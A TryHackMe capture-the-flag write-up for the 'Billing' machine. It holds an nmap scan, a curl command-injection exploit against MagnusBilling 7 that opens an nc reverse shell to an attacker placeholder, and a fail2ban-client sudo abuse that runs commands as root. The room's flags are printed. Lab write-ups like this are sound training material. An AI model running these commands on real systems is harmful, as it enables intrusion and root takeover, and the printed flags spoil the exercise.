Billing — THM WriteUp
Some mistakes can be costly.

What is user.txt?
I haven’t played CTFs for a long time, so I’m a bit green, but by chance today I got into THM and saw the Billing machine so I decided to dare to do it. So, how did this work?
Port scanning:
$ sudo nmap -p- -sCV -vvv -oN nmap-report.txt 10.10.105.159
...
Discovered open port 3306/tcp on 10.10.105.159
Discovered open port 22/tcp on 10.10.105.159
Discovered open port 80/tcp on 10.10.105.159On port 80 we find this web page:

When scanning with the dirsearch tool we found a README and when we read it we see that the server is running a program called MagnusBilling with version 7.

With a quick search, we see that there is a repository with an exploit for this version.
And reading its readme, it tells us to exploit the vulnerability by executing the script or directly this command from our terminal:
curl -s 'http://<TARGET_IP>/mbilling/lib/icepay/icepay.php' --get --data-urlencode 'democ=;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc <ATTACKER_IP> <PORT> >/tmp/f;'So we open a listening port using nc, pass the parameters and get a shell:

Now, we will simply navigate to the magnus user’s home folder and find the user.txt flag:

Flag: THM{4a6831d5f124b25eefb1e92e0f0da4ca}
What is root.txt?
When executing our star command sudo -l we get a very valuable piece of information:
$ sudo -l
Matching Defaults entries for asterisk on ip-10-10-105-159:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
Runas and Command-specific defaults for asterisk:
Defaults!/usr/bin/fail2ban-client !requiretty
User asterisk may run the following commands on ip-10-10-105-159:
(ALL) NOPASSWD: /usr/bin/fail2ban-clientThat’s it! Now we just search for gtfobins for our executable and…

And it is not registered so we will have to be a little more creative to get a shell.
After a while trying useless commands and learning what the application is for I find myself among many searches with the following script.

If we read the code, it explains a little of the steps that the script performs and the commands that we must execute if we want to breach it on our own via terminal. These commands are:
$ sudo /usr/bin/fail2ban-client restart
$ sudo /usr/bin/fail2ban-client set sshd action iptables-multiport actionban "/bin/bash -c 'cat /root/root.txt > /tmp/root.txt && chmod 777 /tmp/root.txt'"
$ sudo /usr/bin/fail2ban-client set sshd banip 127.0.0.1And once these commands have been executed, we will simply go to the /tmp directory and find the flag:

Flag: THM{33ad5b530e71a172648f424ec23fae60}

Carlos <3